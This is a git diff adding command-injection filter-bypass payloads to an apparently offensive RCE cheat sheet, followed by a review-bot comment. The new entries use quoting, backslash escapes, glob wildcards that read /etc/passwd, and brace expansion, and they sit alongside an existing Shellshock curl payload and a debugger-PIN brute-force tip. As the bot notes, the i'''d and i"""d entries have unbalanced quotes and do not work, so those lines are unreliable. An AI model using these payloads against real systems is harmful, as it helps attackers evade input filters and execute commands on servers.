diff --git a/cheatsheets/rce.md b/cheatsheets/rce.md index 66d39cf..7ddfc73 100644 --- a/cheatsheets/rce.md +++ b/cheatsheets/rce.md @@ -10,6 +10,27 @@ strŅ–ng If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`. +**Basic Bypasses** + +``` +i'''d +i"""d +``` + +``` +\l\s -l\a\h +``` + +``` +cat /e?c/p?ss?? +cat /e??/??ss* +``` + +``` +{ls,} +{ls,-a} +``` + **Shellshock Bug** ```bash @@ -18,4 +39,4 @@ If the target is running their application in debug mode you might be able to ru ```zsh curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/ -``` \ No newline at end of file +```
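Review bot: In the first hunk, the entries `i'''d` and `i"""d` under `**Basic Bypasses**` each contain an odd number of quote characters, so as written the third quote opens a string that is never closed and the shell waits for more input instead of running anything. Check the entries against a real shell and use an even quote count if the intent is an empty quoted string inside the command name. The four new fences are also untagged and uncaptioned, while the Shellshock blocks in the same file are tagged `bash` and `zsh`. Tag the new fences the same way and add one line above each block saying what it relies on (quoting, backslash escapes, glob wildcards, brace expansion) and which shells support it.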